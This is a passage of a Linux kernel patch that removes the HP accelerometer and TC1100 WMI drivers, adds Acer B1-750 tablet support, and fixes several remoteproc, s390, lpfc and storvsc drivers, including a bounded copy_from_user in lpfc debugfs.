+-	if (ret > 0)
+-		lis3_dev.irq = ret;
+-
+-	/* If possible use a "standard" axes order */
+-	if (lis3_dev.ac.x && lis3_dev.ac.y && lis3_dev.ac.z) {
+-		pr_info("Using custom axes %d,%d,%d\n",
+-			lis3_dev.ac.x, lis3_dev.ac.y, lis3_dev.ac.z);
+-	} else if (dmi_check_system(lis3lv02d_dmi_ids) == 0) {
+-		pr_info("laptop model unknown, using default axes configuration\n");
+-		lis3_dev.ac = lis3lv02d_axis_normal;
+-	}
+-
+-	/* call the core layer do its init */
+-	ret = lis3lv02d_init_device(&lis3_dev);
+-	if (ret)
+-		return ret;
+-
+-	/* filter to remove HPQ6000 accelerometer data
+-	 * from keyboard bus stream */
+-	if (strstr(dev_name(&device->dev), "HPQ6000"))
+-		i8042_install_filter(hp_accel_i8042_filter);
+-
+-	INIT_WORK(&hpled_led.work, delayed_set_status_worker);
+-	ret = led_classdev_register(NULL, &hpled_led.led_classdev);
+-	if (ret) {
+-		i8042_remove_filter(hp_accel_i8042_filter);
+-		lis3lv02d_joystick_disable(&lis3_dev);
+-		lis3lv02d_poweroff(&lis3_dev);
+-		flush_work(&hpled_led.work);
+-		lis3lv02d_remove_fs(&lis3_dev);
+-		return ret;
+-	}
+-
+-	return ret;
+-}
+-
+-static int lis3lv02d_remove(struct platform_device *device)
+-{
+-	i8042_remove_filter(hp_accel_i8042_filter);
+-	lis3lv02d_joystick_disable(&lis3_dev);
+-	lis3lv02d_poweroff(&lis3_dev);
+-
+-	led_classdev_unregister(&hpled_led.led_classdev);
+-	flush_work(&hpled_led.work);
+-
+-	lis3lv02d_remove_fs(&lis3_dev);
+-	return 0;
+-}
+-
+-static int __maybe_unused lis3lv02d_suspend(struct device *dev)
+-{
+-	/* make sure the device is off when we suspend */
+-	lis3lv02d_poweroff(&lis3_dev);
+-	return 0;
+-}
+-
+-static int __maybe_unused lis3lv02d_resume(struct device *dev)
+-{
+-	lis3lv02d_poweron(&lis3_dev);
+-	return 0;
+-}
+-
+-static SIMPLE_DEV_PM_OPS(hp_accel_pm, lis3lv02d_suspend, lis3lv02d_resume);
+-
+-/* For the HP MDPS aka 3D Driveguard */
+-static struct platform_driver lis3lv02d_driver = {
+-	.probe	= lis3lv02d_probe,
+-	.remove	= lis3lv02d_remove,
+-	.driver	= {
+-		.name	= "hp_accel",
+-		.pm	= &hp_accel_pm,
+-		.acpi_match_table = lis3lv02d_device_ids,
+-	},
+-};
+-module_platform_driver(lis3lv02d_driver);
+-
+-MODULE_DESCRIPTION("Glue between LIS3LV02Dx and HP ACPI BIOS and support for disk protection LED.");
+-MODULE_AUTHOR("Yan Burman, Eric Piel, Pavel Machek");
+-MODULE_LICENSE("GPL");
+diff --git a/drivers/platform/x86/tc1100-wmi.c b/drivers/platform/x86/tc1100-wmi.c
+deleted file mode 100644
+index ded26213c4202..0000000000000
+--- a/drivers/platform/x86/tc1100-wmi.c
++++ /dev/null
+@@ -1,265 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *  HP Compaq TC1100 Tablet WMI Extras Driver
+- *
+- *  Copyright (C) 2007 Carlos Corbacho <carlos@strangeworlds.co.uk>
+- *  Copyright (C) 2004 Jamey Hicks <jamey.hicks@hp.com>
+- *  Copyright (C) 2001, 2002 Andy Grover <andrew.grover@intel.com>
+- *  Copyright (C) 2001, 2002 Paul Diefenbaugh <paul.s.diefenbaugh@intel.com>
+- */
+-
+-#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+-
+-#include <linux/kernel.h>
+-#include <linux/module.h>
+-#include <linux/slab.h>
+-#include <linux/init.h>
+-#include <linux/types.h>
+-#include <linux/acpi.h>
+-#include <linux/platform_device.h>
+-
+-#define GUID "C364AC71-36DB-495A-8494-B439D472A505"
+-
+-#define TC1100_INSTANCE_WIRELESS		1
+-#define TC1100_INSTANCE_JOGDIAL		2
+-
+-MODULE_AUTHOR("Jamey Hicks, Carlos Corbacho");
+-MODULE_DESCRIPTION("HP Compaq TC1100 Tablet WMI Extras");
+-MODULE_LICENSE("GPL");
+-MODULE_ALIAS("wmi:C364AC71-36DB-495A-8494-B439D472A505");
+-
+-static struct platform_device *tc1100_device;
+-
+-struct tc1100_data {
+-	u32 wireless;
+-	u32 jogdial;
+-};
+-
+-#ifdef CONFIG_PM
+-static struct tc1100_data suspend_data;
+-#endif
+-
+-/* --------------------------------------------------------------------------
+-				Device Management
+-   -------------------------------------------------------------------------- */
+-
+-static int get_state(u32 *out, u8 instance)
+-{
+-	u32 tmp;
+-	acpi_status status;
+-	struct acpi_buffer result = { ACPI_ALLOCATE_BUFFER, NULL };
+-	union acpi_object *obj;
+-
+-	if (!out)
+-		return -EINVAL;
+-
+-	if (instance > 2)
+-		return -ENODEV;
+-
+-	status = wmi_query_block(GUID, instance, &result);
+-	if (ACPI_FAILURE(status))
+-		return -ENODEV;
+-
+-	obj = (union acpi_object *) result.pointer;
+-	if (obj && obj->type == ACPI_TYPE_INTEGER) {
+-		tmp = obj->integer.value;
+-	} else {
+-		tmp = 0;
+-	}
+-
+-	if (result.length > 0)
+-		kfree(result.pointer);
+-
+-	switch (instance) {
+-	case TC1100_INSTANCE_WIRELESS:
+-		*out = (tmp == 3) ? 1 : 0;
+-		return 0;
+-	case TC1100_INSTANCE_JOGDIAL:
+-		*out = (tmp == 1) ? 0 : 1;
+-		return 0;
+-	default:
+-		return -ENODEV;
+-	}
+-}
+-
+-static int set_state(u32 *in, u8 instance)
+-{
+-	u32 value;
+-	acpi_status status;
+-	struct acpi_buffer input;
+-
+-	if (!in)
+-		return -EINVAL;
+-
+-	if (instance > 2)
+-		return -ENODEV;
+-
+-	switch (instance) {
+-	case TC1100_INSTANCE_WIRELESS:
+-		value = (*in) ? 1 : 2;
+-		break;
+-	case TC1100_INSTANCE_JOGDIAL:
+-		value = (*in) ? 0 : 1;
+-		break;
+-	default:
+-		return -ENODEV;
+-	}
+-
+-	input.length = sizeof(u32);
+-	input.pointer = &value;
+-
+-	status = wmi_set_block(GUID, instance, &input);
+-	if (ACPI_FAILURE(status))
+-		return -ENODEV;
+-
+-	return 0;
+-}
+-
+-/* --------------------------------------------------------------------------
+-				FS Interface (/sys)
+-   -------------------------------------------------------------------------- */
+-
+-/*
+- * Read/ write bool sysfs macro
+- */
+-#define show_set_bool(value, instance) \
+-static ssize_t \
+-show_bool_##value(struct device *dev, struct device_attribute *attr, \
+-	char *buf) \
+-{ \
+-	u32 result; \
+-	acpi_status status = get_state(&result, instance); \
+-	if (ACPI_SUCCESS(status)) \
+-		return sprintf(buf, "%d\n", result); \
+-	return sprintf(buf, "Read error\n"); \
+-} \
+-\
+-static ssize_t \
+-set_bool_##value(struct device *dev, struct device_attribute *attr, \
+-	const char *buf, size_t count) \
+-{ \
+-	u32 tmp = simple_strtoul(buf, NULL, 10); \
+-	acpi_status status = set_state(&tmp, instance); \
+-		if (ACPI_FAILURE(status)) \
+-			return -EINVAL; \
+-	return count; \
+-} \
+-static DEVICE_ATTR(value, S_IRUGO | S_IWUSR, \
+-	show_bool_##value, set_bool_##value);
+-
+-show_set_bool(wireless, TC1100_INSTANCE_WIRELESS);
+-show_set_bool(jogdial, TC1100_INSTANCE_JOGDIAL);
+-
+-static struct attribute *tc1100_attributes[] = {
+-	&dev_attr_wireless.attr,
+-	&dev_attr_jogdial.attr,
+-	NULL
+-};
+-
+-static const struct attribute_group tc1100_attribute_group = {
+-	.attrs	= tc1100_attributes,
+-};
+-
+-/* --------------------------------------------------------------------------
+-				Driver Model
+-   -------------------------------------------------------------------------- */
+-
+-static int __init tc1100_probe(struct platform_device *device)
+-{
+-	return sysfs_create_group(&device->dev.kobj, &tc1100_attribute_group);
+-}
+-
+-
+-static int tc1100_remove(struct platform_device *device)
+-{
+-	sysfs_remove_group(&device->dev.kobj, &tc1100_attribute_group);
+-
+-	return 0;
+-}
+-
+-#ifdef CONFIG_PM
+-static int tc1100_suspend(struct device *dev)
+-{
+-	int ret;
+-
+-	ret = get_state(&suspend_data.wireless, TC1100_INSTANCE_WIRELESS);
+-	if (ret)
+-		return ret;
+-
+-	ret = get_state(&suspend_data.jogdial, TC1100_INSTANCE_JOGDIAL);
+-	if (ret)
+-		return ret;
+-
+-	return 0;
+-}
+-
+-static int tc1100_resume(struct device *dev)
+-{
+-	int ret;
+-
+-	ret = set_state(&suspend_data.wireless, TC1100_INSTANCE_WIRELESS);
+-	if (ret)
+-		return ret;
+-
+-	ret = set_state(&suspend_data.jogdial, TC1100_INSTANCE_JOGDIAL);
+-	if (ret)
+-		return ret;
+-
+-	return 0;
+-}
+-
+-static const struct dev_pm_ops tc1100_pm_ops = {
+-	.suspend	= tc1100_suspend,
+-	.resume		= tc1100_resume,
+-	.freeze		= tc1100_suspend,
+-	.restore	= tc1100_resume,
+-};
+-#endif
+-
+-static struct platform_driver tc1100_driver = {
+-	.driver = {
+-		.name = "tc1100-wmi",
+-#ifdef CONFIG_PM
+-		.pm = &tc1100_pm_ops,
+-#endif
+-	},
+-	.remove = tc1100_remove,
+-};
+-
+-static int __init tc1100_init(void)
+-{
+-	int error;
+-
+-	if (!wmi_has_guid(GUID))
+-		return -ENODEV;
+-
+-	tc1100_device = platform_device_alloc("tc1100-wmi", PLATFORM_DEVID_NONE);
+-	if (!tc1100_device)
+-		return -ENOMEM;
+-
+-	error = platform_device_add(tc1100_device);
+-	if (error)
+-		goto err_device_put;
+-
+-	error = platform_driver_probe(&tc1100_driver, tc1100_probe);
+-	if (error)
+-		goto err_device_del;
+-
+-	pr_info("HP Compaq TC1100 Tablet WMI Extras loaded\n");
+-	return 0;
+-
+- err_device_del:
+-	platform_device_del(tc1100_device);
+- err_device_put:
+-	platform_device_put(tc1100_device);
+-	return error;
+-}
+-
+-static void __exit tc1100_exit(void)
+-{
+-	platform_device_unregister(tc1100_device);
+-	platform_driver_unregister(&tc1100_driver);
+-}
+-
+-module_init(tc1100_init);
+-module_exit(tc1100_exit);
+diff --git a/drivers/platform/x86/x86-android-tablets.c b/drivers/platform/x86/x86-android-tablets.c
+index 123a4618db55f..9178076d9d7da 100644
+--- a/drivers/platform/x86/x86-android-tablets.c
++++ b/drivers/platform/x86/x86-android-tablets.c
+@@ -265,6 +265,88 @@ static struct gpiod_lookup_table int3496_gpo2_pin22_gpios = {
+ 	},
+ };
+ 
++static struct gpiod_lookup_table int3496_reference_gpios = {
++	.dev_id = "intel-int3496",
++	.table = {
++		GPIO_LOOKUP("INT33FC:01", 15, "vbus", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("INT33FC:02", 1, "mux", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("INT33FC:02", 18, "id", GPIO_ACTIVE_HIGH),
++		{ }
++	},
++};
++
++/* Acer Iconia One 7 B1-750 has an Android factory img with everything hardcoded */
++static const char * const acer_b1_750_mount_matrix[] = {
++	"-1", "0", "0",
++	"0", "1", "0",
++	"0", "0", "1"
++};
++
++static const struct property_entry acer_b1_750_bma250e_props[] = {
++	PROPERTY_ENTRY_STRING_ARRAY("mount-matrix", acer_b1_750_mount_matrix),
++	{ }
++};
++
++static const struct software_node acer_b1_750_bma250e_node = {
++	.properties = acer_b1_750_bma250e_props,
++};
++
++static const struct x86_i2c_client_info acer_b1_750_i2c_clients[] __initconst = {
++	{
++		/* Novatek NVT-ts touchscreen */
++		.board_info = {
++			.type = "NVT-ts",
++			.addr = 0x34,
++			.dev_name = "NVT-ts",
++		},
++		.adapter_path = "\\_SB_.I2C4",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_GPIOINT,
++			.chip = "INT33FC:02",
++			.index = 3,
++			.trigger = ACPI_EDGE_SENSITIVE,
++			.polarity = ACPI_ACTIVE_LOW,
++		},
++	}, {
++		/* BMA250E accelerometer */
++		.board_info = {
++			.type = "bma250e",
++			.addr = 0x18,
++			.swnode = &acer_b1_750_bma250e_node,
++		},
++		.adapter_path = "\\_SB_.I2C3",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_GPIOINT,
++			.chip = "INT33FC:02",
++			.index = 25,
++			.trigger = ACPI_LEVEL_SENSITIVE,
++			.polarity = ACPI_ACTIVE_HIGH,
++		},
++	},
++};
++
++static struct gpiod_lookup_table acer_b1_750_goodix_gpios = {
++	.dev_id = "i2c-NVT-ts",
++	.table = {
++		GPIO_LOOKUP("INT33FC:01", 26, "reset", GPIO_ACTIVE_LOW),
++		{ }
++	},
++};
++
++static struct gpiod_lookup_table * const acer_b1_750_gpios[] = {
++	&acer_b1_750_goodix_gpios,
++	&int3496_reference_gpios,
++	NULL
++};
++
++static const struct x86_dev_info acer_b1_750_info __initconst = {
++	.i2c_client_info = acer_b1_750_i2c_clients,
++	.i2c_client_count = ARRAY_SIZE(acer_b1_750_i2c_clients),
++	.pdev_info = int3496_pdevs,
++	.pdev_count = ARRAY_SIZE(int3496_pdevs),
++	.gpiod_lookup_tables = acer_b1_750_gpios,
++};
++
+ /*
+  * Advantech MICA-071
+  * This is a standard Windows tablet, but it has an extra "quick launch" button
+@@ -1298,17 +1380,8 @@ static const struct x86_i2c_client_info nextbook_ares8_i2c_clients[] __initconst
+ 	},
+ };
+ 
+-static struct gpiod_lookup_table nextbook_ares8_int3496_gpios = {
+-	.dev_id = "intel-int3496",
+-	.table = {
+-		GPIO_LOOKUP("INT33FC:02", 1, "mux", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("INT33FC:02", 18, "id", GPIO_ACTIVE_HIGH),
+-		{ }
+-	},
+-};
+-
+ static struct gpiod_lookup_table * const nextbook_ares8_gpios[] = {
+-	&nextbook_ares8_int3496_gpios,
++	&int3496_reference_gpios,
+ 	NULL
+ };
+ 
+@@ -1435,6 +1508,14 @@ static const struct x86_dev_info xiaomi_mipad2_info __initconst = {
+ };
+ 
+ static const struct dmi_system_id x86_android_tablet_ids[] __initconst = {
++	{
++		/* Acer Iconia One 7 B1-750 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "VESPA2"),
++		},
++		.driver_data = (void *)&acer_b1_750_info,
++	},
+ 	{
+ 		/* Advantech MICA-071 */
+ 		.matches = {
+diff --git a/drivers/remoteproc/imx_dsp_rproc.c b/drivers/remoteproc/imx_dsp_rproc.c
+index 506ec9565716b..dcd07a6a5e945 100644
+--- a/drivers/remoteproc/imx_dsp_rproc.c
++++ b/drivers/remoteproc/imx_dsp_rproc.c
+@@ -721,6 +721,191 @@ static void imx_dsp_rproc_kick(struct rproc *rproc, int vqid)
+ 		dev_err(dev, "%s: failed (%d, err:%d)\n", __func__, vqid, err);
+ }
+ 
++/*
++ * Custom memory copy implementation for i.MX DSP Cores
++ *
++ * The IRAM is part of the HiFi DSP.
++ * According to hw specs only 32-bits writes are allowed.
++ */
++static int imx_dsp_rproc_memcpy(void *dst, const void *src, size_t size)
++{
++	void __iomem *dest = (void __iomem *)dst;
++	const u8 *src_byte = src;
++	const u32 *source = src;
++	u32 affected_mask;
++	int i, q, r;
++	u32 tmp;
++
++	/* destination must be 32bit aligned */
++	if (!IS_ALIGNED((uintptr_t)dest, 4))
++		return -EINVAL;
++
++	q = size / 4;
++	r = size % 4;
++
++	/* copy data in units of 32 bits at a time */
++	for (i = 0; i < q; i++)
++		writel(source[i], dest + i * 4);
++
++	if (r) {
++		affected_mask = GENMASK(8 * r, 0);
++
++		/*
++		 * first read the 32bit data of dest, then change affected
++		 * bytes, and write back to dest.
++		 * For unaffected bytes, it should not be changed
++		 */
++		tmp = readl(dest + q * 4);
++		tmp &= ~affected_mask;
++
++		/* avoid reading after end of source */
++		for (i = 0; i < r; i++)
++			tmp |= (src_byte[q * 4 + i] << (8 * i));
++
++		writel(tmp, dest + q * 4);
++	}
++
++	return 0;
++}
++
++/*
++ * Custom memset implementation for i.MX DSP Cores
++ *
++ * The IRAM is part of the HiFi DSP.
++ * According to hw specs only 32-bits writes are allowed.
++ */
++static int imx_dsp_rproc_memset(void *addr, u8 value, size_t size)
++{
++	void __iomem *tmp_dst = (void __iomem *)addr;
++	u32 tmp_val = value;
++	u32 affected_mask;
++	int q, r;
++	u32 tmp;
++
++	/* destination must be 32bit aligned */
++	if (!IS_ALIGNED((uintptr_t)addr, 4))
++		return -EINVAL;
++
++	tmp_val |= tmp_val << 8;
++	tmp_val |= tmp_val << 16;
++
++	q = size / 4;
++	r = size % 4;
++
++	while (q--)
++		writel(tmp_val, tmp_dst++);
++
++	if (r) {
++		affected_mask = GENMASK(8 * r, 0);
++
++		/*
++		 * first read the 32bit data of addr, then change affected
++		 * bytes, and write back to addr.
++		 * For unaffected bytes, it should not be changed
++		 */
++		tmp = readl(tmp_dst);
++		tmp &= ~affected_mask;
++
++		tmp |= (tmp_val & affected_mask);
++		writel(tmp, tmp_dst);
++	}
++
++	return 0;
++}
++
++/*
++ * imx_dsp_rproc_elf_load_segments() - load firmware segments to memory
++ * @rproc: remote processor which will be booted using these fw segments
++ * @fw: the ELF firmware image
++ *
++ * This function loads the firmware segments to memory, where the remote
++ * processor expects them.
++ *
++ * Return: 0 on success and an appropriate error code otherwise
++ */
++static int imx_dsp_rproc_elf_load_segments(struct rproc *rproc, const struct firmware *fw)
++{
++	struct device *dev = &rproc->dev;
++	const void *ehdr, *phdr;
++	int i, ret = 0;
++	u16 phnum;
++	const u8 *elf_data = fw->data;
++	u8 class = fw_elf_get_class(fw);
++	u32 elf_phdr_get_size = elf_size_of_phdr(class);
++
++	ehdr = elf_data;
++	phnum = elf_hdr_get_e_phnum(class, ehdr);
++	phdr = elf_data + elf_hdr_get_e_phoff(class, ehdr);
++
++	/* go through the available ELF segments */
++	for (i = 0; i < phnum; i++, phdr += elf_phdr_get_size) {
++		u64 da = elf_phdr_get_p_paddr(class, phdr);
++		u64 memsz = elf_phdr_get_p_memsz(class, phdr);
++		u64 filesz = elf_phdr_get_p_filesz(class, phdr);
++		u64 offset = elf_phdr_get_p_offset(class, phdr);
++		u32 type = elf_phdr_get_p_type(class, phdr);
++		void *ptr;
++
++		if (type != PT_LOAD || !memsz)
++			continue;
++
++		dev_dbg(dev, "phdr: type %d da 0x%llx memsz 0x%llx filesz 0x%llx\n",
++			type, da, memsz, filesz);
++
++		if (filesz > memsz) {
++			dev_err(dev, "bad phdr filesz 0x%llx memsz 0x%llx\n",
++				filesz, memsz);
++			ret = -EINVAL;
++			break;
++		}
++
++		if (offset + filesz > fw->size) {
++			dev_err(dev, "truncated fw: need 0x%llx avail 0x%zx\n",
++				offset + filesz, fw->size);
++			ret = -EINVAL;
++			break;
++		}
++
++		if (!rproc_u64_fit_in_size_t(memsz)) {
++			dev_err(dev, "size (%llx) does not fit in size_t type\n",
++				memsz);
++			ret = -EOVERFLOW;
++			break;
++		}
++
++		/* grab the kernel address for this device address */
++		ptr = rproc_da_to_va(rproc, da, memsz, NULL);
++		if (!ptr) {
++			dev_err(dev, "bad phdr da 0x%llx mem 0x%llx\n", da,
++				memsz);
++			ret = -EINVAL;
++			break;
++		}
++
++		/* put the segment where the remote processor expects it */
++		if (filesz) {
++			ret = imx_dsp_rproc_memcpy(ptr, elf_data + offset, filesz);
++			if (ret) {
++				dev_err(dev, "memory copy failed for da 0x%llx memsz 0x%llx\n",
++					da, memsz);
++				break;
++			}
++		}
++
++		/* zero out remaining memory for this segment */
++		if (memsz > filesz) {
++			ret = imx_dsp_rproc_memset(ptr + filesz, 0, memsz - filesz);
++			if (ret) {
++				dev_err(dev, "memset failed for da 0x%llx memsz 0x%llx\n",
++					da, memsz);
++				break;
++			}
++		}
++	}
++
++	return ret;
++}
++
+ static int imx_dsp_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ {
+ 	if (rproc_elf_load_rsc_table(rproc, fw))
+@@ -735,7 +920,7 @@ static const struct rproc_ops imx_dsp_rproc_ops = {
+ 	.start		= imx_dsp_rproc_start,
+ 	.stop		= imx_dsp_rproc_stop,
+ 	.kick		= imx_dsp_rproc_kick,
+-	.load		= rproc_elf_load_segments,
++	.load		= imx_dsp_rproc_elf_load_segments,
+ 	.parse_fw	= imx_dsp_rproc_parse_fw,
+ 	.sanity_check	= rproc_elf_sanity_check,
+ 	.get_boot_addr	= rproc_elf_get_boot_addr,
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 23c1690b8d73f..8746cbb1f168d 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -291,8 +291,16 @@ static void stm32_rproc_mb_vq_work(struct work_struct *work)
+ 	struct stm32_mbox *mb = container_of(work, struct stm32_mbox, vq_work);
+ 	struct rproc *rproc = dev_get_drvdata(mb->client.dev);
+ 
++	mutex_lock(&rproc->lock);
++
++	if (rproc->state != RPROC_RUNNING)
++		goto unlock_mutex;
++
+ 	if (rproc_vq_interrupt(rproc, mb->vq_id) == IRQ_NONE)
+ 		dev_dbg(&rproc->dev, "no message found in vq%d\n", mb->vq_id);
++
++unlock_mutex:
++	mutex_unlock(&rproc->lock);
+ }
+ 
+ static void stm32_rproc_mb_callback(struct mbox_client *cl, void *data)
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index b20ce86b97b29..792e5d245bc38 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -127,6 +127,8 @@ static int prepare_itcw(struct itcw *, unsigned int, unsigned int, int,
+ 			struct dasd_device *, struct dasd_device *,
+ 			unsigned int, int, unsigned int, unsigned int,
+ 			unsigned int, unsigned int);
++static int dasd_eckd_query_pprc_status(struct dasd_device *,
++				       struct dasd_pprc_data_sc4 *);
+ 
+ /* initial attempt at a probe function. this can be simplified once
+  * the other detection code is gone */
+@@ -3732,6 +3734,26 @@ static int count_exts(unsigned int from, unsigned int to, int trks_per_ext)
+ 	return count;
+ }
+ 
++static int dasd_in_copy_relation(struct dasd_device *device)
++{
++	struct dasd_pprc_data_sc4 *temp;
++	int rc;
++
++	if (!dasd_eckd_pprc_enabled(device))
++		return 0;
++
++	temp = kzalloc(sizeof(*temp), GFP_KERNEL);
++	if (!temp)
++		return -ENOMEM;
++
++	rc = dasd_eckd_query_pprc_status(device, temp);
++	if (!rc)
++		rc = temp->dev_info[0].state;
++
++	kfree(temp);
++	return rc;
++}
++
+ /*
+  * Release allocated space for a given range or an entire volume.
+  */
+@@ -3748,6 +3770,7 @@ dasd_eckd_dso_ras(struct dasd_device *device, struct dasd_block *block,
+ 	int cur_to_trk, cur_from_trk;
+ 	struct dasd_ccw_req *cqr;
+ 	u32 beg_cyl, end_cyl;
++	int copy_relation;
+ 	struct ccw1 *ccw;
+ 	int trks_per_ext;
+ 	size_t ras_size;
+@@ -3759,6 +3782,10 @@ dasd_eckd_dso_ras(struct dasd_device *device, struct dasd_block *block,
+ 	if (dasd_eckd_ras_sanity_checks(device, first_trk, last_trk))
+ 		return ERR_PTR(-EINVAL);
+ 
++	copy_relation = dasd_in_copy_relation(device);
++	if (copy_relation < 0)
++		return ERR_PTR(copy_relation);
++
+ 	rq = req ? blk_mq_rq_to_pdu(req) : NULL;
+ 
+ 	features = &private->features;
+@@ -3787,9 +3814,11 @@ dasd_eckd_dso_ras(struct dasd_device *device, struct dasd_block *block,
+ 	/*
+ 	 * This bit guarantees initialisation of tracks within an extent that is
+ 	 * not fully specified, but is only supported with a certain feature
+-	 * subset.
++	 * subset and for devices not in a copy relation.
+ 	 */
+-	ras_data->op_flags.guarantee_init = !!(features->feature[56] & 0x01);
++	if (features->feature[56] & 0x01 && !copy_relation)
++		ras_data->op_flags.guarantee_init = 1;
++
+ 	ras_data->lss = private->conf.ned->ID;
+ 	ras_data->dev_addr = private->conf.ned->unit_addr;
+ 	ras_data->nr_exts = nr_exts;
+diff --git a/drivers/s390/cio/device.c b/drivers/s390/cio/device.c
+index 3b1cd0c96a74b..ba4c69226c337 100644
+--- a/drivers/s390/cio/device.c
++++ b/drivers/s390/cio/device.c
+@@ -1102,6 +1102,8 @@ static void io_subchannel_verify(struct subchannel *sch)
+ 	cdev = sch_get_cdev(sch);
+ 	if (cdev)
+ 		dev_fsm_event(cdev, DEV_EVENT_VERIFY);
++	else
++		css_schedule_eval(sch->schid);
+ }
+ 
+ static void io_subchannel_terminate_path(struct subchannel *sch, u8 mask)
+diff --git a/drivers/s390/cio/qdio.h b/drivers/s390/cio/qdio.h
+index 5ea6249d81803..641f0dbb65a90 100644
+--- a/drivers/s390/cio/qdio.h
++++ b/drivers/s390/cio/qdio.h
+@@ -95,7 +95,7 @@ static inline int do_sqbs(u64 token, unsigned char state, int queue,
+ 		"	lgr	1,%[token]\n"
+ 		"	.insn	rsy,0xeb000000008a,%[qs],%[ccq],0(%[state])"
+ 		: [ccq] "+&d" (_ccq), [qs] "+&d" (_queuestart)
+-		: [state] "d" ((unsigned long)state), [token] "d" (token)
++		: [state] "a" ((unsigned long)state), [token] "d" (token)
+ 		: "memory", "cc", "1");
+ 	*count = _ccq & 0xff;
+ 	*start = _queuestart & 0xff;
+diff --git a/drivers/scsi/lpfc/lpfc_debugfs.c b/drivers/scsi/lpfc/lpfc_debugfs.c
+index f5252e45a48a2..3e365e5e194a2 100644
+--- a/drivers/scsi/lpfc/lpfc_debugfs.c
++++ b/drivers/scsi/lpfc/lpfc_debugfs.c
+@@ -2157,10 +2157,13 @@ lpfc_debugfs_lockstat_write(struct file *file, const char __user *buf,
+ 	char mybuf[64];
+ 	char *pbuf;
+ 	int i;
++	size_t bsize;
+ 
+ 	memset(mybuf, 0, sizeof(mybuf));
+ 
+-	if (copy_from_user(mybuf, buf, nbytes))
++	bsize = min(nbytes, (sizeof(mybuf) - 1));
++
++	if (copy_from_user(mybuf, buf, bsize))
+ 		return -EFAULT;
+ 	pbuf = &mybuf[0];
+ 
+@@ -2181,7 +2184,7 @@ lpfc_debugfs_lockstat_write(struct file *file, const char __user *buf,
+ 			qp->lock_conflict.wq_access = 0;
+ 		}
+ 	}
+-	return nbytes;
++	return bsize;
+ }
+ #endif
+ 
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index 863b2125fed6c..ddd5949d8fc01 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -5402,18 +5402,20 @@ out:
+ 	 * these conditions and release the RPI.
+ 	 */
+ 	if (phba->sli_rev == LPFC_SLI_REV4 &&
+-	    (vport && vport->port_type == LPFC_NPIV_PORT) &&
+-	    !(ndlp->fc4_xpt_flags & SCSI_XPT_REGD) &&
+-	    ndlp->nlp_flag & NLP_RELEASE_RPI) {
+-		if (ndlp->nlp_state !=  NLP_STE_PLOGI_ISSUE &&
+-		    ndlp->nlp_state != NLP_STE_REG_LOGIN_ISSUE) {
+-			lpfc_sli4_free_rpi(phba, ndlp->nlp_rpi);
+-			spin_lock_irq(&ndlp->lock);
+-			ndlp->nlp_rpi = LPFC_RPI_ALLOC_ERROR;
+-			ndlp->nlp_flag &= ~NLP_RELEASE_RPI;
+-			spin_unlock_irq(&ndlp->lock);
+-			lpfc_drop_node(vport, ndlp);
++	    vport && vport->port_type == LPFC_NPIV_PORT &&
++	    !(ndlp->fc4_xpt_flags & SCSI_XPT_REGD)) {
++		if (ndlp->nlp_flag & NLP_RELEASE_RPI) {
++			if (ndlp->nlp_state != NLP_STE_PLOGI_ISSUE &&
++			    ndlp->nlp_state != NLP_STE_REG_LOGIN_ISSUE) {
++				lpfc_sli4_free_rpi(phba, ndlp->nlp_rpi);
++				spin_lock_irq(&ndlp->lock);
++				ndlp->nlp_rpi = LPFC_RPI_ALLOC_ERROR;
++				ndlp->nlp_flag &= ~NLP_RELEASE_RPI;
++				spin_unlock_irq(&ndlp->lock);
++			}
+ 		}
++
++		lpfc_drop_node(vport, ndlp);
+ 	}
+ 
+ 	/* Release the originating I/O reference. */
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index a0665bca54b99..5284f9a0b826e 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -1780,7 +1780,7 @@ static int storvsc_queuecommand(struct Scsi_Host *host, struct scsi_cmnd *scmnd)
+ 
+ 	length = scsi_bufflen(scmnd);
+ 	payload = (struct vmbus_packet_mpb_array *)&cmd_request->mpb;
+-	payload_sz = sizeof(cmd_request->mpb);
++	payload_sz = 0;
+ 
+ 	if (scsi_sg_count(scmnd)) {
+ 		unsigned long offset_in_hvpg = offset_in_hvpage(sgl->offset);
+@@ -1789,10 +1789,10 @@ static int storvsc_queuecommand(struct Scsi_Host *host, struct scsi_cmnd *scmnd)
+ 		unsigned long hvpfn, hvpfns_to_add;
+ 		int j, i = 0, sg_count;
+ 
+-		if (hvpg_count > MAX_PAGE_BUFFER_COUNT) {
++		payload_sz = (hvpg_count * sizeof(u64) +
++			      sizeof(struct vmbus_packet_mpb_array));
+ 
+-			payload_sz = (hvpg_count * sizeof(u64) +
+-				      sizeof(struct vmbus_packet_mpb_array));
++		if (hvpg_count > MAX_PAGE_BUFFER_COUNT) {
+ 			payload = kzalloc(payload_sz, GFP_ATOMIC);
+ 			if (!payload)
+ 				return SCSI_MLQUEUE_DEVICE_BUSY;
+diff --git a/drivers/soundwire/bus.c b/drivers/soundwire/bus.c
+index 76515c33e639e..4fd221d0cc818 100644
+--- a/drivers/soundwire/bus.c
++++ b/drivers/soundwire/bus.c
+@@ -571,9 +571,11 @@ int sdw_nread(struct sdw_slave *slave, u32 addr, size_t count, u8 *val)
+ {
+ 	int ret;
+ 
